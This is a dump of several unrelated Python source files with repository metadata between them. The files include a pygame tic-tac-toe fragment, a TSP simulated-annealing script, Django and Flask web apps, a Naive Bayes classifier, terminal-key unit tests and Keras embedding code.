if 25 + 122 > mouse_position[0] > 25 and 432 + 166 > mouse_position[1] > 432 and b6 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 6
b6 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 482)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 432 + 166 > mouse_position[1] > 432 and b7 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 7
b7 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 482)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 432 + 166 > mouse_position[1] > 432 and b8 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 8
b8 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 482)
checkwin()
pygame.display.update()
| [
"asksathishk@gmail.com"
] | asksathishk@gmail.com |
8f200f77d978f412dcbeeaade7b38805433e5d9d | 794a85e854fcb0f95f30f3ff9cb7138ae22d2039 | /traveling_salesman_simulated_annealing.py | 82d88cd25ffe8413b743a52565e1c7a74abb0708 | [] | no_license | duweizhuo/Learn_algorithm | 398070c6bd3e5ecccbe3e80d60dd7b8cf39f218d | 28c19f381f3a34ecfce45cdb1dd5ccd43e6f1058 | refs/heads/master | 2020-04-14T13:17:16.111819 | 2019-01-15T14:08:22 | 2019-01-15T14:08:22 | 163,864,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import random, numpy, math, copy, matplotlib.pyplot as plt
cities = [[0, 84], [45, 53], [17, 53], [89, 5], [24, 66], [98, 35], [38, 18], [90, 89], [8, 12], [96, 47]]
tour = random.sample(range(10),10)
def dist(city1, city2):
xDist = abs(city1[0] - city2[0])
yDist = abs(city1[1] - city2[1])
distance = math.sqrt(xDist**2 + yDist**2)
return distance
def distChange(tour, new_way):
distanceChange = 0
for k in new_way:
distanceChange += dist(cities[tour[(k+1)%10]], cities[tour[k]])
return distanceChange
for temp in numpy.logspace(0, 5, num = 100000)[::-1]:
[i, j] = sorted(random.sample(range(10), 2))
newTour = copy.deepcopy(tour)
newTour[i], newTour[j] = newTour[j], newTour[i]
P = math.exp((distChange(tour,[j, j-1, i, i-1])) - distChange(newTour, [j, j-1, i, i-1]) / temp)
if P > random.random():
tour = copy.copy(newTour)
plt.plot([cities[tour[i%10]][0] for i in range(11)], [cities[tour[i%10]][1] for i in range(11)], 'xb-')
| [
"noreply@github.com"
] | duweizhuo.noreply@github.com |
c6cb21b34fa419bf4abc0abdd54d3a376f445514 | 8b427ffc8a4c9c538995dce5d21a7d558a82fc8b | /django 家谱管理系统/version2.0-py+js/HomeworkAnswer/firstsite/urls.py | c2d4f6fcd1033beb8e77408fc740a069caaf9611 | [] | no_license | yyhyplxyz/django-and-flask | 73572e565e88d5ac70d4343295b521649a6ccdd8 | 9e763dd9473e70eee8aa96deec09549ae3590a88 | refs/heads/master | 2020-03-26T11:57:52.682150 | 2018-10-09T07:18:58 | 2018-10-09T07:18:58 | 144,868,224 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,384 | py | """firstsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.views import logout
from firstapp.views import index, detail, comment, index_login, index_register, vote,familytree
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^index/', index, name="index"),
url(r'^detail/(?P<id>\d+)/$', detail, name="detail"),
url(r'^comment/(?P<id>\d+)/$', comment, name="comment"),
url(r'^login/$', index_login, name="login"),
url(r'^register/$', index_register, name="register"),
url(r'^logout/', logout, {'next_page': '/index'}, name="logout"),
url(r'^vote/(?P<id>\d+)/$', vote, name="vote"),
url(r'^tree/', familytree, name="tree"),
url(r'^$', index_login, name="login"),
]
| [
"yangyh57@mail2.sysu.edu.cn"
] | yangyh57@mail2.sysu.edu.cn |
21c248c6b320e020a0ffc2d240c18016f8e5cf46 | 16b703f1e62443b9dd3a3e5b4d60859722212f4a | /classify_data.py | 6b51f4eea76d56d93116e99e74d8b1d8ea2e99aa | [] | no_license | haok61bkhn/Intern | a25e8912d437baba98731f57ede2278e39d0393a | 87b99813a28328b807a132d1b1657f71d545ff10 | refs/heads/master | 2020-04-26T07:46:00.469425 | 2019-03-04T09:18:51 | 2019-03-04T09:18:51 | 173,403,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,377 | py | import re
from sklearn.metrics import accuracy_score
data=[] # moi phan tu la từ và số lượng từ
lam=[] # mỗi phần tử là từ trong data và lamda của nó trong 1 label
sizelam=0;
def readFile(path): # doc file tra ve xau
f=open(path,"r",encoding="utf-8")
s=f.read().split("\n")
s.pop()
return (s)
def prepare(s): # tien xu li mang xau
for i in range(0,len(s)):
s[i] = re.sub("%|:|'|@|#|\$|\,|\"|\(|\)|&|\*|Nguồn.*|[0-9]|\/|\.|\“|’|;| - |\]|\[|\?" , '',s[i])
s[i] = re.sub("[\t]| | | - ", " ",s[i])
def Prepare_Data(): # tien xu li data
for i in range(1,14):
data.append([])
s=readFile("classify_data/train/"+str(i)+ ".txt")
prepare(s)
for j in range(0,len(s)):
data[i-1]+=s[j].split(" ")
def Cal_lamda(): # tao vecto va tinh lamda
dx={}
for i in range(0,13):
dx.update(dict.fromkeys(data[i],0))
sizelam=len(dx)
for i in range(0,13):
lam.append([])
lam[i]=dx.copy()
for x in data[i]:
lam[i][x]+=1
for i in range(0,13):
sizedata=len(data[i])
sums=sizedata+sizelam
for x in lam[i]:
lam[i][x]=(lam[i][x]+1)/sums
def Check(s): # tien xu li xau s va du doan label s
import math
s=s.split(" ")
lams={}
lams=dict.fromkeys(s,0)
for x in s:
lams[x]+=1
res=-100000
label=0
for i in range(0,13):
su=0.0
count=0
for x in lams:
if (x in lam[i]) and (len(x)>=3):
su+=lams[x]*math.log10(2*lam[i][x])
if res<su :
res=su
label=i+1
return label
if __name__ == "__main__":
Prepare_Data()
Cal_lamda()
s=readFile("classify_data/test/data.txt")
prepare(s)
f=open("res.txt","w+",encoding="utf-8")
res=[] # mảng dự đooán label của test
for x in s:
z=Check(x)
f.writelines(str(z)+"\n")
res.append(str(z))
res_main=readFile("classify_data/test/label.txt") # mảng kết của đúng của test
print(accuracy_score(res_main,res))
| [
"noreply@github.com"
] | haok61bkhn.noreply@github.com |
4867b3ebc46846cb74560c531ceda687963f68d3 | 3b73266191d85023ced56fa553dccd3ae447e7eb | /photobook/models.py | 9908c7fe4c3d635770b213684547d3934a1f4e48 | [] | no_license | shindle69/photowall-1 | ab28b2f9ec8f18b892b192c8cf714693848dc8ce | d5ef5199ea6593e878fbf31f90f6202d644a9c5d | refs/heads/master | 2020-03-21T17:46:11.845342 | 2017-05-18T15:25:44 | 2017-05-18T15:25:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | from django.db import models
# Create your models here.
class TimeStamp(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Post(TimeStamp):
title = models.CharField(max_length=100,default=None)
category= models.CharField(max_length=100,
choices = (
('글로벌 챌린지','글로벌 챌린지' ),
('은지', '은지'),
('바르셀로나mwc', '바르셀로나mwc'),
('인도네시아 코이카 탐방','인도네시아 코이카 탐방'),
),default=False)
story = models.CharField(max_length=200)
photo = models.ImageField(upload_to='blog/%Y/%M/%D')
def __str__(self):
return self.title | [
"qoentlr37@naver.com"
] | qoentlr37@naver.com |
869f438354c88e21bb4f03b3facb118be4743654 | 8cc083b3407789e8c95f38c95aea9c48ce0e770f | /hellopy/experiment.py | 8a2df87516cf3bd6aadb4e5ab6025d546c80449a | [] | no_license | andrewdotn/vixpy | b15088f66a4fb38e510f1e93836d24f6291a835b | 34267f34ac65a72f1064c2aa25caf78e83c94ce6 | refs/heads/main | 2021-12-02T19:45:08.839788 | 2015-11-27T05:18:23 | 2015-11-27T05:18:23 | 47,004,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | import os.path
import time
from threading import Thread
START_TIME = time.time()
from vix import VixHost, VixVm
with VixHost() as h:
vmx_path = os.path.expanduser(
"~/Virtual Machines.localized/vixpy-base.vmwarevm/vixpy-base.vmx")
with VixVm(h, vmx_path) as base_vm:
def do_stuff(i):
def func():
clone_path = os.path.expanduser(
"~/Virtual Machines.localized/vixpy-clone%d.vmwarevm/vixpy-clone%d.vmx" % (i, i))
base_vm.clone(clone_path)
with VixVm(h, clone_path) as child:
try:
child.power_on()
child.wait_for_tools()
guest = child.login('root', 'test')
print(guest.run_command("ip link"))
finally:
child.power_off()
child.delete()
return func
threads = []
for i in range(0, 5):
threads.append(Thread(target=do_stuff(i)))
for t in threads:
t.start()
for t in threads:
t.join()
END_TIME = time.time()
print("%.3fs elapsed" % (END_TIME - START_TIME))
| [
"andrew@neitsch.ca"
] | andrew@neitsch.ca |
604bb489b26480db07be751687fcf914423a2cae | fc91ef90d128a34cb928408a109f6a2dd6d727f8 | /python/pylibtermkey/test_pylibtermkey.py | 8bcd051b5a8c339ac6de0ac3ee4e90defb0eae17 | [
"BSD-3-Clause",
"MIT"
] | permissive | mvilim/pylibtermkey | 0629875f2363cd73bcefba8eedc55b9018cf4d7c | 39e7cd562deb4ed91798d5e26189bd6760c0489f | refs/heads/master | 2021-06-28T06:20:02.507807 | 2020-10-09T06:41:31 | 2020-10-09T06:41:31 | 167,847,282 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,928 | py | # Copyright (c) 2019 Michael Vilim
#
# This file is part of the pylibtermkey library. It is currently hosted at
# https://github.com/mvilim/pylibtermkey
#
# pylibtermkey is licensed under the MIT license. A copy of the license can be
# found in the root folder of the project.
import abc
import unittest
from unittest import TestCase
import warnings
try:
import curses
curses.setupterm()
bs_str = '<Backspace>'
if curses.tigetstr('kbs') == bytes.fromhex('7F'):
del_str = bs_str
else:
del_str = '<DEL>'
has_curses = True
except:
has_curses = False
try:
from pynput.keyboard import Key, Controller
def suppress_deprecation(action):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
action()
has_pynput = True
except:
has_pynput = False
import pylibtermkey as termkey
class Keys:
CTRL = 1
DEL = 2
ESC = 3
class TermKeyTests(abc.ABC):
def setUp(self):
self.tk = termkey.TermKey()
def tearDown(self):
self.tk.stop()
class NonInputTests(TermKeyTests, TestCase):
def test_new_flags(self):
new_flags = {termkey.TermKeyFlag.CTRLC}
self.tk.set_flags(new_flags)
self.assertSetEqual(self.tk.get_flags(), new_flags)
def test_wait(self):
default_time = 50
new_time = 25
self.assertEqual(self.tk.get_waittime(), default_time)
self.tk.set_waittime(new_time)
self.assertEqual(self.tk.get_waittime(), new_time)
def test_new_canonflags(self):
new_canonflags = {termkey.TermKeyCanon.DELBS}
self.tk.set_canonflags(new_canonflags)
self.assertSetEqual(self.tk.get_canonflags(), new_canonflags)
class InputTests(TermKeyTests, abc.ABC):
@abc.abstractmethod
def tap(self, key):
pass
@abc.abstractmethod
def modify_tap(self, key, modifier):
pass
def test_wait_simple_letter(self):
letter = 'j'
self.tap(letter)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), letter)
def test_get(self):
letter = 'j'
self.tap(letter)
res, key = self.tk.getkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), letter)
def test_force_get(self):
self.tap(Keys.ESC)
res, key = self.tk.getkey()
self.assertEqual(res, termkey.TermKeyResult.AGAIN)
res, key = self.tk.getkey_force()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), '<Escape>')
def test_ctrlc_flag(self):
self.tk.set_flags({termkey.TermKeyFlag.CTRLC})
# restart termkey to pick up the new interrupt behavior
self.tk.stop()
self.tk.start()
self.modify_tap('c', Keys.CTRL)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), '<C-c>')
@unittest.skipUnless(has_curses, "Requires curses to query terminfo DEL mapping")
def test_canonicalize(self):
self.tap(Keys.DEL)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), del_str)
self.tk.set_canonflags({termkey.TermKeyCanon.DELBS})
self.tk.canonicalise(key)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), bs_str)
def test_key_symbol(self):
self.tap(Keys.ESC)
res, key = self.tk.getkey_force()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(key.code(), termkey.TermKeySym.ESCAPE)
@unittest.skipUnless(has_pynput, "Requires pynput (and thus a real input mechanism, like an X server)")
class RealInputTests(InputTests, TestCase):
def setUp(self):
super(InputTests, self).setUp()
self.k = Controller()
def tearDown(self):
super(InputTests, self).tearDown()
def map_key(self, key):
kmap = self.keymap()
if isinstance(key, str):
return key
elif key in kmap:
return kmap[key]
else:
raise Exception('Could not find {} key in keymap'.format(key))
def tap(self, key):
def tap():
mkey = self.map_key(key)
self.k.press(mkey)
self.k.release(mkey)
suppress_deprecation(tap)
self.tk.advisereadable()
def modify_tap(self, key, modifier):
def modify_tap():
mkey = self.map_key(key)
mmod = self.map_key(modifier)
self.k.press(mmod)
self.k.press(mkey)
self.k.release(mkey)
self.k.release(mmod)
suppress_deprecation(modify_tap)
def keymap(self):
return {Keys.CTRL: Key.ctrl, Keys.DEL: Key.backspace, Keys.ESC: Key.esc}
class FakeInputTests(InputTests, TestCase):
def map_key(self, key):
kmap = self.keymap()
if isinstance(key, str):
return bytes(key, 'utf8')
elif key in kmap:
return kmap[key]
else:
raise Exception('Could not find {} key in keymap'.format(key))
def tap(self, key):
mkey = self.map_key(key)
self.tk.push_bytes(mkey)
def modify_tap(self, key, modifier):
if (modifier is Keys.CTRL) and (key is 'c'):
self.tk.push_bytes(bytes.fromhex('03'))
else:
raise Exception('Other modifiers supported in fake input testing')
def keymap(self):
return {Keys.DEL: bytes.fromhex('7F'), Keys.ESC: bytes.fromhex('1b')}
if __name__ == '__main__':
unittest.main()
| [
"michael.vilim@gmail.com"
] | michael.vilim@gmail.com |
17dd662ee4171dcdc0847174ef3082dc8f66cefb | d5c6da7dd1c87b2e9f6ecef51cc4d1c3402f7b8b | /Level2Assignment/manage.py | a4c44a059dd1a7ab32785490e7d4be2de5eafa53 | [] | no_license | JAGASABARIVEL/Django | 85fabf8debf9af54bd7381939f7d77451ce42182 | b3cf50a80e4542aabab66cbdcab70edce0799603 | refs/heads/master | 2022-11-23T23:35:56.079040 | 2019-12-07T16:51:34 | 2019-12-07T16:51:34 | 225,845,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Level2Assignment.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"JAGASABARIVEL@gmail.com"
] | JAGASABARIVEL@gmail.com |
2a3d5be3009d4b609bfbe5cd460ac5966b9737f3 | accf2a28b038b3ca03d3b263739b3b00c7c834b1 | /task_app/task_app/urls.py | 8eefbe6fc8c9c8b133df0f86da5e55ccf1102f36 | [] | no_license | erinrosenbaum/django_task_app_with_crud | 7b7b4aecb8de7f68b6df51b413de5f39c38a1441 | d27fde01e528e93243e48d44264bcf390087cbb9 | refs/heads/master | 2020-04-17T20:20:47.571730 | 2019-01-22T00:53:39 | 2019-01-22T00:53:39 | 166,901,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """task_app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('tasks/', include('tasks.urls')),
]
| [
"erinrosenbaum@yahoo.com"
] | erinrosenbaum@yahoo.com |
cf2eddc7ea32518b89f8312d10d7054b596f5604 | 70ba0363b5df57df949c516ace000f5f0949af4a | /autoencodercmp/embedding.py | ca450244171a95135754e271d8456ba03a7c3f4c | [
"MIT"
] | permissive | SiyanZhou97/VAE | 41659cc722bb6dc267f22af10231e1173cda1d0b | 6e19f9dc865155f45554a462f4599f7ebc6a40db | refs/heads/master | 2022-11-27T15:14:01.398437 | 2020-08-04T00:10:40 | 2020-08-04T00:10:40 | 273,518,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,875 | py | import numpy as np
import tensorflow as tf
from models import create_lstm_ae, create_binned_lstm_vae, create_lstm_vae
from align_maze import align_maze, align_ITI
from data_generator import DataGenerator
from deviance import deviance
#============================================
# return embedding
#============================================
def ae_embed(bin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size):
n_trial, n_bin, n_neuron = bin_training_data.shape
ae, ae_encoder, ae_encoder2 = create_lstm_ae(input_dim=n_neuron, timesteps=n_bin,
intermediate_dim=intermediate_dim,
latent_dim=latent_dim,
latent_fac=latent_fac)
ae.fit(bin_training_data, bin_training_data, epochs=epochs, batch_size=batch_size, verbose=0)
latent_point=ae_encoder.predict(bin_training_data, verbose=0)
latent_trajectory = ae_encoder2.predict(bin_training_data, verbose=0)
return latent_point,latent_trajectory
def vae_binned_embed(bin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size):
n_trial, n_bin, n_neuron = bin_training_data.shape
vae_binned, vae_binned_encoder, vae_binned_encoder2 = create_binned_lstm_vae(input_dim=n_neuron, timesteps=n_bin,
intermediate_dim=intermediate_dim, latent_dim=latent_dim,
latent_fac=latent_fac, epsilon_std=1.)
vae_binned.fit(bin_training_data, bin_training_data, epochs=epochs, batch_size=batch_size, verbose=0)
latent_point = vae_binned_encoder.predict(bin_training_data, verbose=0)
latent_trajectory = vae_binned_encoder2.predict(bin_training_data, verbose=0)
return latent_point,latent_trajectory
def vae_embed(nobin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size=1):
n_neuron=nobin_training_data[0].shape[-1]
training_generator = DataGenerator(nobin_training_data, nobin_training_data, batch_size=batch_size)
vae, vae_encoder, vae_encoder2 = create_lstm_vae(input_dim=n_neuron, timesteps=None,
intermediate_dim=intermediate_dim, latent_dim=latent_dim,
latent_fac=latent_fac, epsilon_std=1.)
vae.fit_generator(generator=training_generator,
epochs=epochs, verbose=0)
latent_point=[]
latent_trajectory=[]
for i in range(len(nobin_training_data)):
shape1, shape2 = nobin_training_data[i].shape
latent_point.append(vae_encoder.predict(nobin_training_data[i].reshape(1, shape1, shape2), verbose=0))
latent_trajectory.append(vae_encoder2.predict(nobin_training_data[i].reshape(1, shape1, shape2), verbose=0))
return latent_point, latent_trajectory
| [
"noreply@github.com"
] | SiyanZhou97.noreply@github.com |
8a42ff3f0285714a41fc38ccd9bd47a68b007b22 | 94a287b6db759df48d9ed98b9450caabb863e1ac | /nearestPower.py | c058f9f21d4baacda7dfc73f5a76e23b392f044e | [
"MIT"
] | permissive | JanviChitroda24/pythonprogramming | 4341e778aa2e091a0edddcf8d39028336d4bd1b6 | 59fa28aa9b48cea4d6e97bf386e688860bd9aef5 | refs/heads/master | 2023-08-15T11:32:28.358675 | 2021-10-17T12:17:01 | 2021-10-17T12:17:01 | 418,115,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | import math
def npow(a,b):
x=round(math.log(b)/math.log(a))
y=x+1
if(abs((a**x)-b)>abs((a**y)-b)):
return a**y
else:
return a**x
p=int(input("Enter your 1st Number:"))
q=int(input("Enter your 2nd Number:"))
print("The Nearest Power is:",npow(p,q))
| [
"noreply@github.com"
] | JanviChitroda24.noreply@github.com |
f614e10f66f919c3deda9664c82532d0b145b14c | bb77a939d49a1d6e789d655aa30dfc5a4bf4f50f | /week-1/detect-capital.py | ee4528e1ac65d3c8f8db21fa4208a56080c120b2 | [] | no_license | johnsanc/wb-cohort3 | 0778eacb908a79c9aca124c7800c5370649b2457 | 8faeb2c3416b19c4e1950abfb11a2c3a5651babf | refs/heads/master | 2020-06-10T04:14:56.489619 | 2019-08-19T05:56:58 | 2019-08-19T05:56:58 | 193,579,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper():
return True
elif word.islower():
return True
else:
if word[0].isupper() and word[1:].islower():
return True
else:
return False | [
"johnny.ss@icloud.com"
] | johnny.ss@icloud.com |
746adb8e7b81e29709b78b2e40fdb14231dfbbc9 | ec13b507c34d58cfffe1c93d427a7c70ac74158b | /5_Sequence_Model/week2/Word Vector Repressiontation/w2v_utils.py | a78fab1b1c0453b168ee15fbda79f08ad3f51cfd | [] | no_license | xiaoxue11/DL-homework | 2e7cdb3e0eb116c19e3f8226f55c80afd78d82e7 | 4f6505557b8a225b210bfb22531dd5b6c4d79ad8 | refs/heads/master | 2020-06-01T16:01:34.957727 | 2019-06-08T03:47:22 | 2019-06-08T03:47:22 | 190,842,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,082 | py | from keras.models import Model
from keras.layers import Input, Dense, Reshape, merge
from keras.layers.embeddings import Embedding
from keras.preprocessing.sequence import skipgrams
from keras.preprocessing import sequence
import urllib.request # module defines functions and classes which help in opening URLs
import collections
import os
import zipfile
import numpy as np
import tensorflow as tf
window_size = 3
vector_dim = 300
epochs = 1000
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
def maybe_download(filename, url, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
if not os.path.exists(filename):
filename, _ = urllib.request.urlretrieve(url + filename, filename)
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]]
count.extend(collections.Counter(words).most_common(n_words - 1))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0 # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
def collect_data(vocabulary_size=10000):
url = 'http://mattmahoney.net/dc/'
filename = maybe_download('text8.zip', url, 31344016)
vocabulary = read_data(filename)
print(vocabulary[:7])
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary,
vocabulary_size)
del vocabulary # Hint to reduce memory.
return data, count, dictionary, reverse_dictionary
class SimilarityCallback:
def run_sim(self):
for i in range(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
sim = self._get_sim(valid_examples[i])
nearest = (-sim).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in range(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
@staticmethod
def _get_sim(valid_word_idx):
sim = np.zeros((vocab_size,))
in_arr1 = np.zeros((1,))
in_arr2 = np.zeros((1,))
in_arr1[0,] = valid_word_idx
for i in range(vocab_size):
in_arr2[0,] = i
out = validation_model.predict_on_batch([in_arr1, in_arr2])
sim[i] = out
return sim
def read_glove_vecs(glove_file):
with open(glove_file, 'r',encoding='UTF-8') as f:
words = set()
word_to_vec_map = {}
for line in f:
line = line.strip().split()
curr_word = line[0]
words.add(curr_word)
word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)
return words, word_to_vec_map
def relu(x):
"""
Compute the relu of x
Arguments:
x -- A scalar or numpy array of any size.
Return:
s -- relu(x)
"""
s = np.maximum(0,x)
return s
def initialize_parameters(vocab_size, n_h):
"""
Arguments:
layer_dims -- python array (list) containing the dimensions of each layer in our network
Returns:
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2":
W1 -- weight matrix of shape (n_h, vocab_size)
b1 -- bias vector of shape (n_h, 1)
W2 -- weight matrix of shape (vocab_size, n_h)
b2 -- bias vector of shape (vocab_size, 1)
"""
np.random.seed(3)
parameters = {}
parameters['W1'] = np.random.randn(n_h, vocab_size) / np.sqrt(vocab_size)
parameters['b1'] = np.zeros((n_h, 1))
parameters['W2'] = np.random.randn(vocab_size, n_h) / np.sqrt(n_h)
parameters['b2'] = np.zeros((vocab_size, 1))
return parameters
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum()
| [
"xuezhang0111@gmail.com"
] | xuezhang0111@gmail.com |
24298090eb5325f13c5cd6ff497fe96f16a5321f | 5c58c55052a717c9fe970f0f1d509273c2560f92 | /app.py | 7f9c2ffacb9332bed936e30b727eb3d7ed34f2d6 | [] | no_license | WiamSalaheldin/flask-task-manager-project | c43ebc2562887db20ad2cd789ef476eafe81f6b6 | 22749feb180506f8ed8329301326dca01a691ef3 | refs/heads/master | 2023-02-10T00:25:21.888196 | 2021-01-12T01:39:02 | 2021-01-12T01:39:02 | 327,696,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,363 | py | import os
from flask import (
Flask, flash, render_template,
redirect, request, session, url_for)
from flask_pymongo import PyMongo
from bson.objectid import ObjectId
from werkzeug.security import generate_password_hash, check_password_hash
if os.path.exists("env.py"):
import env
app = Flask(__name__)
app.config["MONGO_DBNAME"] = os.environ.get("MONGO_DBNAME")
app.config["MONGO_URI"] = os.environ.get("MONGO_URI")
app.secret_key = os.environ.get("SECRET_KEY")
mongo = PyMongo(app)
@app.route("/")
@app.route("/get_tasks")
def get_tasks():
tasks = list(mongo.db.tasks.find())
return render_template("tasks.html", tasks=tasks)
@app.route("/search", methods=["GET", "POST"])
def search():
query = request.form.get("query")
tasks = list(mongo.db.tasks.find({"$text": {"$search": query}}))
return render_template("tasks.html", tasks=tasks)
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "POST":
# check if username already exists in db
existing_user = mongo.db.users.find_one(
{"username": request.form.get("username").lower()})
if existing_user:
# redirect the user back to the url_for(
# ) this same 'register' function,
flash("Username already exists")
return redirect(url_for("register"))
# first item in our dictionary will be "username", and that will
# be set to grab the username
# value from our form, using the name="" attribute.
# store this into the database as lowercase letters.
register = {
"username": request.form.get("username").lower(),
"password": generate_password_hash(request.form.get("password"))
}
mongo.db.users.insert_one(register)
# put the new user into 'session' cookie
session["user"] = request.form.get("username").lower()
flash("Registration Successful!")
return redirect(url_for("profile", username=session["user"]))
return render_template("register.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
# check if username exists in db
existing_user = mongo.db.users.find_one(
{"username": request.form.get("username").lower()})
if existing_user:
# ensure hashed password matches user input
if check_password_hash(
existing_user["password"], request.form.get("password")):
session["user"] = request.form.get("username").lower()
flash("Welcome, {}".format(
request.form.get("username")))
return redirect(url_for(
"profile", username=session["user"]))
else:
# invalid password match
flash("Incorrect Username and/or Password")
return redirect(url_for("login"))
else:
# username doesn't exist
flash("Incorrect Username and/or Password")
return redirect(url_for("login"))
return render_template("login.html")
@app.route("/profile/<username>", methods=["GET", "POST"])
def profile(username):
# grab the session user's username from db
username = mongo.db.users.find_one(
{"username": session["user"]})["username"]
if session["user"]:
return render_template("profile.html", username=username)
return redirect(url_for("login"))
@app.route("/logout")
def logout():
# remove user from session cookie
flash("You have been logged out")
session.pop("user")
return redirect(url_for("login"))
@app.route("/add_task", methods=["GET", "POST"])
def add_task():
if request.method == "POST":
# generate an <option> instance for each category in our collection
is_urgent = "on" if request.form.get("is_urgent") else "off"
task = {
"category_name": request.form.get("category_name"),
"task_name": request.form.get("task_name"),
"task_description": request.form.get("task_description"),
"is_urgent": is_urgent,
"due_date": request.form.get("due_date"),
"created_by": session["user"]
}
mongo.db.tasks.insert_one(task)
flash("Task Successfully Added")
return redirect(url_for("get_tasks"))
categories = mongo.db.categories.find().sort("category_name", 1)
return render_template("add_task.html", categories=categories)
@app.route("/edit_task/<task_id>", methods=["GET", "POST"])
def edit_task(task_id):
if request.method == "POST":
is_urgent = "on" if request.form.get("is_urgent") else "off"
submit = {
"category_name": request.form.get("category_name"),
"task_name": request.form.get("task_name"),
"task_description": request.form.get("task_description"),
"is_urgent": is_urgent,
"due_date": request.form.get("due_date"),
"created_by": session["user"]
}
# search for a task in the database by the task ID
